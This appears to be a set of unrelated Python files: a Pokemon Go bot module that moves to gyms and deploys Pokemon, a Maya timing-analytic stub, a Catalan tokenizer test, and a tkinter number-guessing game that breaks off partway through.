self.bot.gym_pokemon_disabled_global_warning = True
return WorkerResult.SUCCESS
else:
self.bot.gym_pokemon_disabled_global_warning = False
self.pokemons = inventory.pokemons().all()
self.fort_pokemons = [p for p in self.pokemons if p.in_fort]
self.pokemons = [p for p in self.pokemons if not p.in_fort]
self.dropped_gyms = []
for pokemon in self.fort_pokemons:
self.dropped_gyms.append(pokemon.fort_id)
if self._should_print():
self.display_fort_pokemon()
self._compute_next_update()
# Do display the stats about Pokemon in Gym and collection time [please]
if not self.enabled:
return WorkerResult.SUCCESS
if self.bot.softban:
return WorkerResult.SUCCESS
if len(self.fort_pokemons) >= self.take_at_most:
if self._should_print():
self.logger.info("We have a max of %s Pokemon in gyms." % self.take_at_most)
return WorkerResult.SUCCESS
if not self.should_run():
return WorkerResult.SUCCESS
if self.destination is None:
self.check_close_gym()
if self.destination is None:
self.determin_new_destination()
if self.destination is not None:
result = self.move_to_destination()
# Can return RUNNING to move to a gym
return result
if hasattr(self.bot, "hunter_locked_target") and self.bot.hunter_locked_target is not None:
# Don't move to a gym when hunting for a Pokemon
return WorkerResult.SUCCESS
return WorkerResult.SUCCESS
def check_close_gym(self):
# Check if we are walking past a gym
close_gyms = self.get_gyms_in_range()
# Filter active raids from the gyms
close_gyms = filter(lambda gym: gym["id"] not in self.raid_gyms, close_gyms)
if len(close_gyms) > 0:
# self.logger.info("Walking past a gym!")
for gym in close_gyms:
if gym["id"] in self.dropped_gyms:
continue
gym_details = self.get_gym_details(gym)
if gym_details:
pokes = self._get_pokemons_in_gym(gym_details)
if len(pokes) == 6:
continue
if 'enabled' in gym:
if not gym['enabled']:
continue
if 'owned_by_team' in gym:
if gym["owned_by_team"] == self.team:
if 'gym_display' in gym:
display = gym['gym_display']
if 'slots_available' in display:
self.logger.info("Gym has %s open spots!" % display['slots_available'])
if display['slots_available'] > 0 and gym["id"] not in self.dropped_gyms:
self.logger.info("Dropping pokemon in %s" % gym_details["name"])
self.drop_pokemon_in_gym(gym, pokes)
if self.destination is not None and gym["id"] == self.destination["id"]:
self.destination = None
return WorkerResult.SUCCESS
else:
self.logger.info("Neutral gym? %s" % gym)
self.logger.info("Dropping pokemon in %s" % gym_details["name"])
self.drop_pokemon_in_gym(gym, [])
if self.destination is not None and gym["id"] == self.destination["id"]:
self.destination = None
return WorkerResult.SUCCESS
def determin_new_destination(self):
gyms = self.get_gyms()
if len(gyms) == 0:
if len(self.recent_gyms) == 0 and self._should_print():
self.logger.info("No Gyms in range to scan!")
return WorkerResult.SUCCESS
self.logger.info("Inspecting %s gyms." % len(gyms))
self.logger.info("Recent gyms: %s" % len(self.recent_gyms))
self.logger.info("Active raid gyms: %s" % len(self.raid_gyms))
teams = []
for gym in gyms:
# Ignore after done for 5 mins
self.recent_gyms.append(gym["id"])
if 'enabled' in gym:
# Gym can be closed for a raid or something, skipp to the next
if not gym['enabled']:
continue
if 'owned_by_team' in gym:
if gym["owned_by_team"] == 1:
teams.append("Mystic")
elif gym["owned_by_team"] == 2:
teams.append("Valor")
elif gym["owned_by_team"] == 3:
teams.append("Instinct")
# else:
# self.logger.info("Unknown team? %s" % gym)
if gym["owned_by_team"] == self.team:
if 'gym_display' in gym:
display = gym['gym_display']
if 'slots_available' in display:
if self.leave_at_least_spots > 0:
if display['slots_available'] > self.leave_at_least_spots:
self.logger.info("Gym has %s open spots!" % display['slots_available'])
self.destination = gym
break
else:
self.logger.info("Gym has %s open spots, but we don't drop Pokemon in it because that would leave less than %s open spots" % (display['slots_available'], self.leave_at_least_spots))
else:
self.logger.info("Gym has %s open spots!" % display['slots_available'])
self.destination = gym
break
else:
# self.logger.info("Found a Neutral gym?")
# self.logger.info("Info: %s" % gym)
self.destination = gym
break
if len(teams) > 0:
count_teams = Counter(teams)
self.logger.info("Gym Teams %s", ", ".join('{}({})'.format(key, val) for key, val in count_teams.items()))
def move_to_destination(self):
if self.check_interval >= 4:
self.check_interval = 0
gyms = self.get_gyms()
for g in gyms:
if g["id"] == self.destination["id"]:
# self.logger.info("Inspecting target: %s" % g)
if "owned_by_team" in g and g["owned_by_team"] is not self.team:
self.logger.info("Damn! Team %s took gym before we arrived!" % TEAMS[g["owned_by_team"]])
self.destination = None
return WorkerResult.SUCCESS
break
else:
self.check_interval += 1
# Moving to a gym to deploy Pokemon
unit = self.bot.config.distance_unit # Unit to use when printing formatted distance
lat = self.destination["latitude"]
lng = self.destination["longitude"]
details = fort_details(self.bot, self.destination["id"], lat, lng)
gym_name = details.get('name', 'Unknown')
dist = distance(
self.bot.position[0],
self.bot.position[1],
lat,
lng
)
noised_dist = distance(
self.bot.noised_position[0],
self.bot.noised_position[1],
lat,
lng
)
moving = noised_dist > Constants.MAX_DISTANCE_FORT_IS_REACHABLE if self.bot.config.replicate_gps_xy_noise else dist > Constants.MAX_DISTANCE_FORT_IS_REACHABLE
if moving:
fort_event_data = {
'fort_name': u"{}".format(gym_name),
'distance': format_dist(dist, unit),
}
self.emit_event(
'moving_to_fort',
formatted="Moving towards open Gym {fort_name} - {distance}",
data=fort_event_data
)
step_walker = walker_factory(self.walker, self.bot, lat, lng)
if not step_walker.step():
return WorkerResult.RUNNING
else:
#Running fails. Let's stop moving to the gym
return WorkerResult.SUCCESS
else:
self.emit_event(
'arrived_at_fort',
formatted=("Arrived at Gym %s." % gym_name)
)
gym_details = self.get_gym_details(self.destination)
current_pokemons = self._get_pokemons_in_gym(gym_details)
self.drop_pokemon_in_gym(self.destination, current_pokemons)
self.destination = None
if len(self.fort_pokemons) >= self.take_at_most:
self.logger.info("We have a max of %s Pokemon in gyms." % self.take_at_most)
return WorkerResult.SUCCESS
elif self.chain_fill_gyms:
# Look around if there are more gyms to fill
self.determin_new_destination()
# If there is none, we're done, else we go to the next!
if self.destination is None:
return WorkerResult.SUCCESS
else:
return WorkerResult.RUNNING
else:
return WorkerResult.SUCCESS
def get_gym_details(self, gym):
lat = gym['latitude']
lng = gym['longitude']
in_reach = False
if self.bot.config.replicate_gps_xy_noise:
if distance(self.bot.noised_position[0], self.bot.noised_position[1], gym['latitude'], gym['longitude']) <= Constants.MAX_DISTANCE_FORT_IS_REACHABLE:
in_reach = True
else:
if distance(self.bot.position[0], self.bot.position[1], gym['latitude'], gym['longitude']) <= Constants.MAX_DISTANCE_FORT_IS_REACHABLE:
in_reach = True
if in_reach:
request = self.bot.api.create_request()
request.gym_get_info(gym_id=gym['id'], gym_lat_degrees=lat, gym_lng_degrees=lng, player_lat_degrees=self.bot.position[0],player_lng_degrees=self.bot.position[1])
response_dict = request.call()
if ('responses' in response_dict) and ('GYM_GET_INFO' in response_dict['responses']):
details = response_dict['responses']['GYM_GET_INFO']
return details
else:
return False
# details = fort_details(self.bot, , lat, lng)
# fort_name = details.get('name', 'Unknown')
# self.logger.info("Checking Gym: %s (%s pts)" % (fort_name, gym['gym_points']))
def _get_pokemons_in_gym(self, gym_details):
pokemon_names = []
gym_info = gym_details.get('gym_status_and_defenders', None)
if gym_info:
defenders = gym_info.get('gym_defender', [])
for defender in defenders:
motivated_pokemon = defender.get('motivated_pokemon')
pokemon_info = motivated_pokemon.get('pokemon')
pokemon_id = pokemon_info.get('pokemon_id')
pokemon_names.append(Pokemons.name_for(pokemon_id))
return pokemon_names
def drop_pokemon_in_gym(self, gym, current_pokemons):
self.pokemons = inventory.pokemons().all()
self.fort_pokemons = [p for p in self.pokemons if p.in_fort]
self.pokemons = [p for p in self.pokemons if not p.in_fort]
close_gyms = self.get_gyms_in_range()
empty_gym = False
for pokemon in self.fort_pokemons:
if pokemon.fort_id == gym["id"]:
self.logger.info("We are already in this gym!")
if pokemon.fort_id not in self.dropped_gyms:
self.dropped_gyms.append(pokemon.fort_id)
self.recent_gyms.append(gym["id"])
return WorkerResult.SUCCESS
for g in close_gyms:
if g["id"] == gym["id"]:
if 'owned_by_team' in g:
self.logger.info("Expecting team: %s it is: %s" % (self.bot.player_data['team'], g["owned_by_team"]) )
if g["owned_by_team"] is not self.team:
self.logger.info("Can't drop in a enemy gym!")
self.recent_gyms.append(gym["id"])
return WorkerResult.SUCCESS
else:
#self.logger.info("Empty gym?? %s" % g)
gym_details = self.get_gym_details(gym)
#self.logger.info("Details: %s" % gym_details)
empty_gym = True
if not gym_details or gym_details == {}:
self.logger.info("No details for this Gym? Blacklisting!")
self.blacklist.append(gym["id"])
return WorkerResult.SUCCESS
# Check for raid
if 'raid_info' in gym:
raid_info = gym["raid_info"]
raid_starts = datetime.fromtimestamp(int(raid_info["raid_battle_ms"]) / 1e3)
raid_ends = datetime.fromtimestamp(int(raid_info["raid_end_ms"]) / 1e3)
self.logger.info("Raid starts: %s" % raid_starts.strftime('%Y-%m-%d %H:%M:%S.%f'))
self.logger.info("Raid ends: %s" % raid_ends.strftime('%Y-%m-%d %H:%M:%S.%f'))
t = datetime.today()
if raid_starts < datetime.now():
self.logger.info("Active raid?")
if raid_ends < datetime.now():
self.logger.info("No need to wait.")
elif (raid_ends-t).seconds > 600:
self.logger.info("Need to wait long than 10 minutes, skipping")
self.destination = None
self.recent_gyms.append(gym["id"])
self.raid_gyms[gym["id"]] = raid_ends
return WorkerResult.SUCCESS
else:
first_time = False
while raid_ends > datetime.now():
raid_ending = (raid_ends-datetime.today()).seconds
sleep_m, sleep_s = divmod(raid_ending, 60)
sleep_h, sleep_m = divmod(sleep_m, 60)
sleep_hms = '%02d:%02d:%02d' % (sleep_h, sleep_m, sleep_s)
if not first_time:
# Clear the last log line!
stdout.write("\033[1A\033[0K\r")
stdout.flush()
first_time = True
self.logger.info("Waiting for %s for raid to end..." % sleep_hms)
if raid_ending > 20:
sleep(20)
else:
sleep(raid_ending)
break
else:
self.logger.info("Raid has not begun yet!")
if 'same_team_deploy_lockout_end_ms' in gym:
# self.logger.info("%f" % gym["same_team_deploy_lockout_end_ms"])
org_time = int(gym["same_team_deploy_lockout_end_ms"]) / 1e3
lockout_time = datetime.fromtimestamp(org_time)
t = datetime.today()
if lockout_time > datetime.now():
self.logger.info("Lockout time: %s" % lockout_time.strftime('%Y-%m-%d %H:%M:%S.%f'))
first_time = False
while lockout_time > datetime.now():
lockout_ending = (lockout_time-datetime.today()).seconds
sleep_m, sleep_s = divmod(lockout_ending, 60)
sleep_h, sleep_m = divmod(sleep_m, 60)
sleep_hms = '%02d:%02d:%02d' % (sleep_h, sleep_m, sleep_s)
if not first_time:
# Clear the last log line!
stdout.write("\033[1A\033[0K\r")
stdout.flush()
first_time = True
self.logger.info("Waiting for %s deployment lockout to end..." % sleep_hms)
if lockout_ending > 40:
sleep(40)
break
else:
sleep(lockout_ending)
break
#FortDeployPokemon
# self.logger.info("Trying to deploy Pokemon in gym: %s" % gym)
gym_details = self.get_gym_details(gym)
# self.logger.info("Gym details: %s" % gym_details)
fort_pokemon = self._get_best_pokemon(current_pokemons)
pokemon_id = fort_pokemon.unique_id
# self.logger.info("Trying to deploy %s (%s)" % (fort_pokemon, pokemon_id))
# self.logger.info("Gym in control by %s. I am on team %s" % (gym["owned_by_team"], self.bot.player_data['team']))
request = self.bot.api.create_request()
request.gym_deploy(
fort_id=gym["id"],
pokemon_id=pokemon_id,
player_lat_degrees=f2i(self.bot.position[0]),
player_lng_degrees=f2i(self.bot.position[1])
)
# self.logger.info("Req: %s" % request)
response_dict = request.call()
# self.logger.info("Called deploy pokemon: %s" % response_dict)
if ('responses' in response_dict) and ('GYM_DEPLOY' in response_dict['responses']):
deploy = response_dict['responses']['GYM_DEPLOY']
result = response_dict.get('status_code', -1)
self.recent_gyms.append(gym["id"])
# self.logger.info("Status: %s" % result)
if result == 1:
self.dropped_gyms.append(gym["id"])
self.fort_pokemons.append(fort_pokemon)
gym_details = self.get_gym_details(gym)
# SUCCES
#self.logger.info("We deployed %s (%s CP) in the gym! We now have %s Pokemon in gyms!" % (fort_pokemon.name, fort_pokemon.cp, len(self.dropped_gyms)))
self.emit_event(
'deployed_pokemon',
formatted=("We deployed %s (%s CP) in the gym %s!!" % (fort_pokemon.name, fort_pokemon.cp, gym_details["name"])),
data={'gym_id': gym['id'], 'pokemon_id': pokemon_id}
)
return WorkerResult.SUCCESS
elif result == 2:
#ERROR_ALREADY_HAS_POKEMON_ON_FORT
self.logger.info('ERROR_ALREADY_HAS_POKEMON_ON_FORT')
self.dropped_gyms.append(gym["id"])
return WorkerResult.ERROR
elif result == 3:
#ERROR_OPPOSING_TEAM_OWNS_FORT
self.logger.info('ERROR_OPPOSING_TEAM_OWNS_FORT')
return WorkerResult.ERROR
elif result == 4:
#ERROR_FORT_IS_FULL
self.logger.info('ERROR_FORT_IS_FULL')
return WorkerResult.ERROR
elif result == 5:
#ERROR_NOT_IN_RANGE
self.logger.info('ERROR_NOT_IN_RANGE')
return WorkerResult.ERROR
elif result == 6:
#ERROR_PLAYER_HAS_NO_TEAM
self.logger.info('ERROR_PLAYER_HAS_NO_TEAM')
return WorkerResult.ERROR
elif result == 7:
#ERROR_POKEMON_NOT_FULL_HP
self.logger.info('ERROR_POKEMON_NOT_FULL_HP')
return WorkerResult.ERROR
elif result == 8:
#ERROR_PLAYER_BELOW_MINIMUM_LEVEL
self.logger.info('ERROR_PLAYER_BELOW_MINIMUM_LEVEL')
return WorkerResult.ERROR
elif result == 8:
#ERROR_POKEMON_IS_BUDDY
self.logger.info('ERROR_POKEMON_IS_BUDDY')
return WorkerResult.ERROR
def get_gyms(self, skip_recent_filter=False):
if len(self.gyms) == 0:
self.gyms = self.bot.get_gyms(order_by_distance=True)
if self._should_recheck():
self.gyms = self.bot.get_gyms(order_by_distance=True)
self._compute_next_recheck()
if self._should_expire():
self.recent_gyms = []
self._compute_next_expire()
# Check raid gyms for raids that ended
for gym_id in list(self.raid_gyms.keys()):
if self.raid_gyms[gym_id] < datetime.now():
self.logger.info("Raid at %s ended (%s)" % (gym_id, self.raid_gyms[gym_id]))
del(self.raid_gyms[gym_id])
gyms = []
# if not skip_recent_filter:
gyms = filter(lambda gym: gym["id"] not in self.recent_gyms, self.gyms)
# Filter blacklisted gyms
gyms = filter(lambda gym: gym["id"] not in self.blacklist, gyms)
# Filter out gyms we already in
gyms = filter(lambda gym: gym["id"] not in self.dropped_gyms, gyms)
# Filter ongoing raids
gyms = filter(lambda gym: gym["id"] not in self.raid_gyms, gyms)
# filter fake gyms
# self.gyms = filter(lambda gym: "type" not in gym or gym["type"] != 1, self.gyms)
# sort by current distance
gyms.sort(key=lambda x: distance(
self.bot.position[0],
self.bot.position[1],
x['latitude'],
x['longitude']
))
return gyms
def get_gyms_in_range(self):
gyms = self.get_gyms()
if self.bot.config.replicate_gps_xy_noise:
gyms = filter(lambda fort: distance(
self.bot.noised_position[0],
self.bot.noised_position[1],
fort['latitude'],
fort['longitude']
) <= Constants.MAX_DISTANCE_FORT_IS_REACHABLE, self.gyms)
else:
gyms = filter(lambda fort: distance(
self.bot.position[0],
self.bot.position[1],
fort['latitude'],
fort['longitude']
) <= Constants.MAX_DISTANCE_FORT_IS_REACHABLE, self.gyms)
return gyms
def _should_print(self):
return self.next_update is None or datetime.now() >= self.next_update
def _should_expire(self):
return self.next_expire is None or datetime.now() >= self.next_expire
def _compute_next_expire(self):
self.next_expire = datetime.now() + timedelta(seconds=300)
def _compute_next_recheck(self):
wait = uniform(self.min_recheck, self.max_recheck)
self.recheck = datetime.now() + timedelta(seconds=wait)
def _should_recheck(self):
return self.recheck is None or datetime.now() >= self.recheck
def _compute_next_update(self):
"""
Computes the next update datetime based on the minimum update interval.
:return: Nothing.
:rtype: None
"""
self.next_update = datetime.now() + timedelta(seconds=self.min_interval)
def _get_best_pokemon(self, current_pokemons):
def get_poke_info(info, pokemon):
poke_info = {
'cp': pokemon.cp,
'iv': pokemon.iv,
'ivcp': pokemon.ivcp,
'ncp': pokemon.cp_percent,
'level': pokemon.level,
'hp': pokemon.hp,
'dps': pokemon.moveset.dps
}
if info not in poke_info:
raise ConfigException("order by {}' isn't available".format(self.order_by))
return poke_info[info]
legendaries = ["Lugia", "Zapdos", "HoOh", "Celebi", "Articuno", "Moltres", "Mewtwo", "Mew"]
# Don't place a Pokemon which is already in the gym (prevent ALL Blissey etc)
possible_pokemons = [p for p in self.pokemons if not p.name in current_pokemons]
# Don't put in Pokemon above 3000 cp (morale drops too fast)
possible_pokemons = [p for p in possible_pokemons if p.cp < 3000 and p.name not in self.ignore_max_cp_pokemon]
# Filter out "bad" Pokemon
possible_pokemons = [p for p in possible_pokemons if not p.is_bad]
# Ignore legendaries for in Gyms
possible_pokemons = [p for p in possible_pokemons if not p.name in legendaries]
# Filter out "never place" Pokemon
possible_pokemons = [p for p in possible_pokemons if p.name not in self.never_place]
# HP Must be max
possible_pokemons = [p for p in possible_pokemons if p.hp == p.hp_max]
possible_pokemons = [p for p in possible_pokemons if not p.in_fort]
# Sort them
pokemons_ordered = sorted(possible_pokemons, key=lambda x: get_poke_info(self.order_by, x), reverse=True)
# Top 20 picks
pokemons_ordered = pokemons_ordered[0:20]
if self.pick_random_pokemon:
# Pick a random one!
random.shuffle(pokemons_ordered)
return pokemons_ordered[0]
|
"""
Gather basic scene timing information from the profiler,
with and without the invisibility evaluator active.
"""
from maya.analytics.decorators import makeAnalytic
from maya.debug.emModeManager import emModeManager
from maya.analytics.decorators import addHelp
from maya.analytics.BaseAnalytic import BaseAnalytic
from maya.analytics.decorators import addMethodDocs
class analyticTiming(BaseAnalytic):
"""
Examine timing information for basic operations in different modes.
The list of modes can be modified as needs change by altering the
MODE_LIST value in the script.
WARNING: Since this test gets timing for file-new you will lose your
data if you run it on the current scene.
It measures the following events for each of the modes, in microseconds. If
multiple instances of the event are found then the last one found is used,
under the assumption that the state is most steady by then.
EvaluationGraphConstruction : Graph build time
EvaluationGraphPartitioning : Graph partitioning time
EvaluationGraphExecution : Graph execution time
Vp2SceneRender : Viewport 2 rendering time
Vp1SceneRender : Legacy Viewport rendering time
ClusterCount : Total number of custom evaluator clusters
ClusterNodeCount : Total number of nodes in custom evaluator clusters
InvisibilityClusterCount : Total number of invisibility clusters
InvisibilityClusterNodeCount : Total number of nodes in invisibility clusters
InvisibilityCreateClusters : Time taken by the invisibility evaluator to create its clusters
InvisibilityDiscover : Time taken by the invisibility evaluator to discover invisible nodes
InvisibilityMarkNodes : Time taken by the invisibility evaluator to mark its nodes
InvisibilityCreatePartitioning : Time taken by the invisibility evaluator to create its partitions
Note: InvisibilityCreateClusters is the parent of these three steps so don't add them:
- InvisibilityDiscover
- InvisibilityMarkNodes
- InvisibilityCreatePartitioning
and these, which are independent of the evaluator configuration:
FileNew : Time to empty the scene of the current file, in seconds
CycleCount : Total number of cycle clusters
CycleNodeCount : Total number of nodes in cycle clusters
Example output running in parallel mode both with and without the
invisibility for a scene that uses VP2:
"output" : {
"emp-invisibility" : {
"EvaluationGraphConstruction" : 5632,
"EvaluationGraphPartitioning" : 392,
"EvaluationGraphExecution" : 2020211,
"Vp2SceneRender" : 7152,
"Vp1SceneRender" : 0,
"ClusterCount" : 72,
"ClusterNodeCount" : 1230,
"InvisibilityClusterCount" : 0,
"InvisibilityClusterNodeCount" : 0,
"InvisibilityDiscover" : 0,
"InvisibilityCreateClusters" : 0,
"InvisibilityMarkNodes" : 0,
"InvisibilityCreatePartitioning" : 0
},
"emp+invisibility" : {
"EvaluationGraphConstruction" : 7801,
"EvaluationGraphPartitioning" : 738,
"EvaluationGraphExecution" : 19374,
"Vp2SceneRender" : 7326,
"Vp1SceneRender" : 0,
"ClusterCount" : 129,
"ClusterNodeCount" : 7183,
"InvisibilityClusterCount" : 11,
"InvisibilityClusterNodeCount" : 11,
"InvisibilityDiscover" : 12341,
"InvisibilityCreateClusters" : 123,
"InvisibilityMarkNodes" : 1110,
"InvisibilityCreatePartitioning" : 84
},
"CycleCount" : 3,
"CycleNodeCount" : 14,
"FileNew" : 4.19238
}
"""
def run(self):
"""
Run the analytic on the current scene.
:return: JSON results as described in the class doc
"""
pass
def help():
"""
Call this method to print the class documentation, including all methods.
"""
pass
ANALYTIC_DESCRIPTION_DETAILED = 'Examine timing information for basic operations in different modes.\nThe list of modes can be modified as needs change by altering the\nMODE_LIST value in the script.\n\nWARNING: Since this test gets timing for file-new you will lose your\n data if you run it on the current scene.\n\nIt measures the following events for each of the modes, in microseconds. If\nmultiple instances of the event are found then the last one found is used,\nunder the assumption that the state is most steady by then.\n\n EvaluationGraphConstruction : Graph build time\n EvaluationGraphPartitioning : Graph partitioning time\n EvaluationGraphExecution : Graph execution time\n Vp2SceneRender : Viewport 2 rendering time\n Vp1SceneRender : Legacy Viewport rendering time\n ClusterCount : Total number of custom evaluator clusters\n ClusterNodeCount : Total number of nodes in custom evaluator clusters\n InvisibilityClusterCount : Total number of invisibility clusters\n InvisibilityClusterNodeCount : Total number of nodes in invisibility clusters\n InvisibilityCreateClusters : Time taken by the invisibility evaluator to create its clusters\n InvisibilityDiscover : Time taken by the invisibility evaluator to discover invisible nodes\n InvisibilityMarkNodes : Time taken by the invisibility evaluator to mark its nodes\n InvisibilityCreatePartitioning : Time taken by the invisibility evaluator to create its partitions\n\nNote: InvisibilityCreateClusters is the parent of these three steps so don\'t add them:\n - InvisibilityDiscover\n - InvisibilityMarkNodes\n - InvisibilityCreatePartitioning\n\nand these, which are independent of the evaluator configuration:\n FileNew : Time to empty the scene of the current file, in seconds\n CycleCount : Total number of cycle clusters\n CycleNodeCount : Total number of nodes in cycle clusters\n\nExample output running in parallel mode both with and without the\ninvisibility for a scene that uses VP2:\n\n "output" : {\n "emp-invisibility" : {\n "EvaluationGraphConstruction" : 5632,\n "EvaluationGraphPartitioning" : 392,\n "EvaluationGraphExecution" : 2020211,\n "Vp2SceneRender" : 7152,\n "Vp1SceneRender" : 0,\n "ClusterCount" : 72,\n "ClusterNodeCount" : 1230,\n "InvisibilityClusterCount" : 0,\n "InvisibilityClusterNodeCount" : 0,\n "InvisibilityDiscover" : 0,\n "InvisibilityCreateClusters" : 0,\n "InvisibilityMarkNodes" : 0,\n "InvisibilityCreatePartitioning" : 0\n },\n "emp+invisibility" : {\n "EvaluationGraphConstruction" : 7801,\n "EvaluationGraphPartitioning" : 738,\n "EvaluationGraphExecution" : 19374,\n "Vp2SceneRender" : 7326,\n "Vp1SceneRender" : 0,\n "ClusterCount" : 129,\n "ClusterNodeCount" : 7183,\n "InvisibilityClusterCount" : 11,\n "InvisibilityClusterNodeCount" : 11,\n "InvisibilityDiscover" : 12341,\n "InvisibilityCreateClusters" : 123,\n "InvisibilityMarkNodes" : 1110,\n "InvisibilityCreatePartitioning" : 84\n },\n "CycleCount" : 3,\n "CycleNodeCount" : 14,\n "FileNew" : 4.19238\n }'
ANALYTIC_DESCRIPTION_SHORT = []
ANALYTIC_LABEL = []
ANALYTIC_NAME = 'Timing'
__fulldocs__ = 'Examine timing information for basic operations in different modes.\nThe list of modes can be modified as needs change by altering the\nMODE_LIST value in the script.\n\nWARNING: Since this test gets timing for file-new you will lose your\n data if you run it on the current scene.\n\nIt measures the following events for each of the modes, in microseconds. If\nmultiple instances of the event are found then the last one found is used,\nunder the assumption that the state is most steady by then.\n\n EvaluationGraphConstruction : Graph build time\n EvaluationGraphPartitioning : Graph partitioning time\n EvaluationGraphExecution : Graph execution time\n Vp2SceneRender : Viewport 2 rendering time\n Vp1SceneRender : Legacy Viewport rendering time\n ClusterCount : Total number of custom evaluator clusters\n ClusterNodeCount : Total number of nodes in custom evaluator clusters\n InvisibilityClusterCount : Total number of invisibility clusters\n InvisibilityClusterNodeCount : Total number of nodes in invisibility clusters\n InvisibilityCreateClusters : Time taken by the invisibility evaluator to create its clusters\n InvisibilityDiscover : Time taken by the invisibility evaluator to discover invisible nodes\n InvisibilityMarkNodes : Time taken by the invisibility evaluator to mark its nodes\n InvisibilityCreatePartitioning : Time taken by the invisibility evaluator to create its partitions\n\nNote: InvisibilityCreateClusters is the parent of these three steps so don\'t add them:\n - InvisibilityDiscover\n - InvisibilityMarkNodes\n - InvisibilityCreatePartitioning\n\nand these, which are independent of the evaluator configuration:\n FileNew : Time to empty the scene of the current file, in seconds\n CycleCount : Total number of cycle clusters\n CycleNodeCount : Total number of nodes in cycle clusters\n\nExample output running in parallel mode both with and without the\ninvisibility for a scene that uses VP2:\n\n "output" : {\n "emp-invisibility" : {\n "EvaluationGraphConstruction" : 5632,\n "EvaluationGraphPartitioning" : 392,\n "EvaluationGraphExecution" : 2020211,\n "Vp2SceneRender" : 7152,\n "Vp1SceneRender" : 0,\n "ClusterCount" : 72,\n "ClusterNodeCount" : 1230,\n "InvisibilityClusterCount" : 0,\n "InvisibilityClusterNodeCount" : 0,\n "InvisibilityDiscover" : 0,\n "InvisibilityCreateClusters" : 0,\n "InvisibilityMarkNodes" : 0,\n "InvisibilityCreatePartitioning" : 0\n },\n "emp+invisibility" : {\n "EvaluationGraphConstruction" : 7801,\n "EvaluationGraphPartitioning" : 738,\n "EvaluationGraphExecution" : 19374,\n "Vp2SceneRender" : 7326,\n "Vp1SceneRender" : 0,\n "ClusterCount" : 129,\n "ClusterNodeCount" : 7183,\n "InvisibilityClusterCount" : 11,\n "InvisibilityClusterNodeCount" : 11,\n "InvisibilityDiscover" : 12341,\n "InvisibilityCreateClusters" : 123,\n "InvisibilityMarkNodes" : 1110,\n "InvisibilityCreatePartitioning" : 84\n },\n "CycleCount" : 3,\n "CycleNodeCount" : 14,\n "FileNew" : 4.19238\n }\nBase class for output for analytics.\n\nThe default location for the anlaytic output is in a subdirectory\ncalled \'MayaAnalytics\' in your temp directory. You can change that\nat any time by calling set_output_directory().\n\nClass static member:\n ANALYTIC_NAME : Name of the analytic\n\nClass members:\n directory : Directory the output will go to\n is_static : True means this analytic doesn\'t require a file to run\n logger : Logging object for errors, warnings, and messages\n plug_namer : Object creating plug names, possibly anonymous\n node_namer : Object creating node names, possibly anonymous\n csv_output : Location to store legacy CSV output\n plug_namer : Set by option \'anonymous\' - if True then make plug names anonymous\n node_namer : Set by option \'anonymous\' - if True then make node names anonymous\n __options : Dictionary of per-analytic options\n\n\tMethods\n\t-------\n\tdebug : Utility to standardize debug messages coming from analytics.\n\n\terror : Utility to standardize errors coming from analytics.\n\n\testablish_baseline : This is run on an empty scene, to give the analytic a chance to\n\t establish any baseline data it might need (e.g. the nodes in an\n\t empty scene could all be ignored by the analytic)\n\t \n\t Base implementation does nothing. Derived classes should call\n\t their super() method though, in case something does get added.\n\n\thelp : Call this method to print the class documentation, including all methods.\n\n\tjson_file : Although an analytic is free to create any set of output files it\n\t wishes there will always be one master JSON file containing the\n\n\tlog : Utility to standardize logging messages coming from analytics.\n\n\tmarker_file : Returns the name of the marker file used to indicate that the\n\t computation of an analytic is in progress. If this file remains\n\t in a directory after the analytic has run that means it was\n\t interrupted and the data is not up to date.\n\t \n\t This file provides a safety measure against machines going down\n\t or analytics crashing.\n\n\tname : Get the name of this type of analytic\n\n\toption : Return TRUE if the option specified has been set on this analytic.\n\t option: Name of option to check\n\n\toutput_files : This is used to get the list of files the analytic will generate.\n\t There will always be a JSON file generated which contains at minimum\n\t the timing information. An analytic should override this method only\n\t if they are adding more output files (e.g. a .jpg file).\n\t \n\t This should only be called after the final directory has been set.\n\n\trun : Run the analytic on the current scene.\n\t :return: JSON results as described in the class doc\n\n\tset_options : Modify the settings controlling the run operation of the analytic.\n\t Override this method if your analytic has some different options\n\t available to it, but be sure to call this parent version after since\n\t it sets common options.\n\n\tset_output_directory : Call this method to set a specific directory as the output location.\n\t The special names \'stdout\' and \'stderr\' are recognized as the\n\t output and error streams respectively rather than a directory.\n\n\twarning : Utility to standardize warnings coming from analytics.\n'
is_static = False
kAnalyticLabel = []
kAnalyticDescriptionShort = []
MODE_LIST = []
|
import pytest
@pytest.mark.parametrize(
"text,expected_tokens", [("d'un", ["d'", "un"]), ("s'ha", ["s'", "ha"])]
)
def test_contractions(ca_tokenizer, text, expected_tokens):
"""Test that the contractions are split into two tokens"""
tokens = ca_tokenizer(text)
assert len(tokens) == 2
assert [t.text for t in tokens] == expected_tokens
|
# import modules
import tkinter as t
from random import randrange
tk = t.Tk()
tk.title("Guessing Game")
tk.iconbitmap("logo-ico.ico")
lblInst = t.Label(tk, text = "Guess a number from 0 to 9",)
lblLine0 = t.Label(tk, text = "*********************************************************************")
lblNoGuess = t.Label(tk, text = "No of Guesses: 0")
lblMaxGuess = t.Label(tk, text = "Max Guess: 3")
lblLine1 = t.Label(tk, text = "*********************************************************************")
lblLogs = t.Label(tk, text="Game Logs")
lblLine2 = t.Label(tk, text = "*********************************************************************")
# Create the buttons
buttons = []
for index in range(0, 10):
button = t.Button(tk, text=index, command=lambda index=index : process(index),
state=t.DISABLED, bg='#99ffbb', fg='#1a001a')
buttons.append(button)
btnStartGameList = []
for index in range(0, 1):
btnStartGame = t.Button(tk, text="Start Game", command=lambda : startgame(index), bg='#66ffff')
btnStartGameList.append(btnStartGame)
# Append elements to grid
lblInst.grid(row=0, column=0, columnspan=5)
lblLine0.grid(row=1, column=0, columnspan=5)
lblNoGuess.grid(row=2, column=0, columnspan=3)
lblMaxGuess.grid(row=2, column=3, columnspan=2)
lblLine1.grid(row=3, column=0, columnspan=5)
lblLogs.grid(row=4, column=0, columnspan=5) # row 4 - 8 is reserved for showing logs
lblLine2.grid(row=9, column=0, columnspan=5)
for row in range(0, 2):
for col in range(0, 5):
i = row * 5 + col # convert 2d index to 1d. 5= total number of columns
buttons[i].grid(row=row+10, column=col)
btnStartGameList[0].grid(row=13, column=0, columnspan=5)
# Main game logic
guess = 0
totalNumberOfGuesses = 0
secretNumber = randrange(10)
print(secretNumber)
lblLogs = []
guess_row = 4
# Functions
# Reset all variables
def init():
global buttons, guess, totalNumberOfGuesses, secretNumber, lblNoGuess, lblLogs, guess_row
guess = 0
totalNumberOfGuesses = 0
